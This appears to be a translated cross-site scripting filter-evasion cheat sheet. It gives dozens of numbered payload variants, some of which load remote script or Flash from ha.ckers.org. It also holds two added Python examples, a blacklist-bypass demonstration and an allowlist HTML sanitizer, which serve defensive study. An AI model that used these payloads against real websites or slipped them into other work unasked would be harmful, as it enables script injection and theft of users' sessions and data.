1. Vary the case of characters

<sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another file extension instead of .js

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:
body {
background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
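The variants in sections 1, 2, 3 and 5 all exist to beat a hand-written regex blacklist. The Python below is an added example for this page, not code from the original post: it runs those variants (constructed from the page's own payloads, with the t.js and bad.jpg placeholders as given) against a typical case-insensitive "<script" blacklist and then against plain HTML entity encoding, which is the correct defence whenever user data is rendered as text between tags. The regex and the variant list are this example's assumptions.

```python
import html
import re

# Constructed sample input: the script-tag variants listed in sections 1, 2, 3 and 5.
VARIANTS = [
    '<script>alert(1)</script>',
    '<sCript>alert(1)</scRipT>',
    '<<script>alert(1)//<</script>',
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
    '<SCRIPT/SRC="t.js"></SCRIPT>',
    '<SCRIPT/anyword SRC="t.js"></SCRIPT>',
    '<script src="bad.jpg"></script>',
]

# A typical hand-written blacklist: reject "<script" followed by whitespace or ">".
# It is already case-insensitive, so the case-variation trick alone does not beat it.
NAIVE_BLACKLIST = re.compile(r'<script[\s>]', re.IGNORECASE)


def blacklist_blocks(fragment: str) -> bool:
    """True if the regex blacklist would reject this input."""
    return NAIVE_BLACKLIST.search(fragment) is not None


def blacklist_misses() -> list[str]:
    """The variants from the page that pass the blacklist untouched."""
    return [v for v in VARIANTS if not blacklist_blocks(v)]


def encode_for_text_context(user_input: str) -> str:
    """The correct defence for data rendered between tags: encode, do not filter.

    Every '<', '>', '&' and quote becomes an entity, so no tag can form,
    whatever the input looks like.
    """
    return html.escape(user_input, quote=True)


def all_neutralised() -> bool:
    """True when no variant survives encoding with a raw '<' in the output."""
    return all('<' not in encode_for_text_context(v) for v in VARIANTS)


if __name__ == "__main__":
    for v in blacklist_misses():
        print("blacklist missed:", v)
    print("encoding neutralises every variant:", all_neutralised())
```

Running it shows the point of section 5: the "/" separator is neither whitespace nor ">", so the two SCRIPT/ variants pass the blacklist untouched, while entity encoding leaves no raw "<" in any of the seven outputs. Widening the regex only moves the boundary; the encoding approach has none to move.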
6. Use a tab or a newline to evade (the gaps inside "javascript" below are tab or newline characters)

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line

7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. script in HTML tag

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in an SWF

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and then reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
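Sections 6 through 14 are all attribute-level and URL-level tricks (event handlers, javascript: in any URL-bearing attribute, tab and newline padding inside the scheme, CDATA and comment splitting), and where an application must render user-supplied HTML the defence is not a longer blacklist but an allowlist sanitizer built on a real HTML parser, which sees the same lowercased tag and attribute names the browser does. The following is an added example written for this page, not the author's code, using Python's standard-library html.parser; the allowed tag, attribute and scheme sets are illustrative assumptions. It goes slightly beyond the page in that entity-encoded scheme characters (for example &#x0A; inside "javascript:") are decoded by the parser before the check and so are caught as well.

```python
import html
import re
from html.parser import HTMLParser

# Illustrative allowlists (an assumption for this example, not a standard):
# everything not listed here is removed, instead of listing what to block.
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}   # contents are dropped along with the tag

# Browsers strip ASCII control characters and whitespace (tab, newline, ...) from
# a URL before resolving its scheme, so "jav<TAB>ascript:" is still javascript:.
_STRIP_BEFORE_SCHEME_CHECK = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")


def url_is_safe(value: str) -> bool:
    """Allow relative URLs and the listed schemes; reject every other scheme."""
    cleaned = _STRIP_BEFORE_SCHEME_CHECK.sub("", value)
    m = _SCHEME.match(cleaned)
    if m is None:
        return True                       # no scheme at all: relative URL
    return m.group(1).lower() in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Rebuild a fragment keeping only allowlisted tags, attributes and URL schemes."""

    def __init__(self) -> None:
        # convert_charrefs=True decodes &#x0A; and friends in attribute values before
        # we see them, which is why entity-encoded "javascript:" is caught too.
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropping = 0                 # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        # The parser has already lowercased the name and tolerated "<SCRIPT/SRC=...>".
        if tag not in ALLOWED_TAGS:
            if tag in RAW_TEXT_TAGS:
                self.dropping += 1
            return                        # unknown tag removed, its text content kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                  # drops on*, style, dynsrc, lowsrc, background ...
            if name in URL_ATTRS and not url_is_safe(value):
                continue                  # drops javascript: in any form
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.dropping = max(0, self.dropping - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))

    # Comments, <![CDATA[...]]> sections and <?xml ...>/<?import ...> processing
    # instructions reach HTMLParser's no-op default handlers and are dropped.


def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs modelled on the payloads listed above.
    for sample in ('<IMG SRC="jav\tascript:alert(1)">',
                   '<body onload="alert(1)">hello',
                   '<a href="http://example.com/" onclick="alert(1)">ok</a>'):
        print(repr(sample), "->", repr(sanitize(sample)))
```

Two design choices carry the weight here: the style attribute is not in any allowlist at all, which disposes of the expression() and @import variants of sections 7 and 8 without trying to parse CSS, and the scheme check is made on a copy of the value with control characters removed, so the tab and newline padding of section 6 is judged the way the browser will judge it. A production system should use a maintained sanitizer library rather than this sketch, but the shape (parse, allowlist, re-serialize) is the same.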